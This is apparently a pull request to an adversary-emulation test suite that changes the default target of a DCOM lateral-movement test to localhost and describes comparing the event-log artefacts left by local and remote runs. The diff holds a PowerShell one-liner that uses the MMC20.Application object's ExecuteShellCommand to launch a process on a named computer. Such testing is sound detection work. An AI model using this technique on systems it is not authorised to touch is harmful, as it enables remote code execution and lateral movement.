### PR TITLE
T1021.006 - Change default target for MMC remote exec to localhost

### DIFF
--- a/atomics/T1021.006/T1021.006.yaml
+++ b/atomics/T1021.006/T1021.006.yaml
@@ -30,7 +30,7 @@ atomic_tests:
     computer_name:
       description: Name of Computer
       type: string
-      default: computer1
+      default: localhost
   executor:
     command: |
       [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")


### PR DESCRIPTION
**Details:**
The remote execution through MMC (which btw should probably not be in this technique, as suggested in #1042 ) has a default value of `computer1` for the execution target. Defaulting to `localhost` so it may run without additional argument. The detection is likely based upon the process tree anyway.

**Testing:**
Ran locally and remotely, comparing artefacts in Sysmon and Security event logs to see what may be missed be running it locally (4624/3, that's all)

**Associated Issues:**
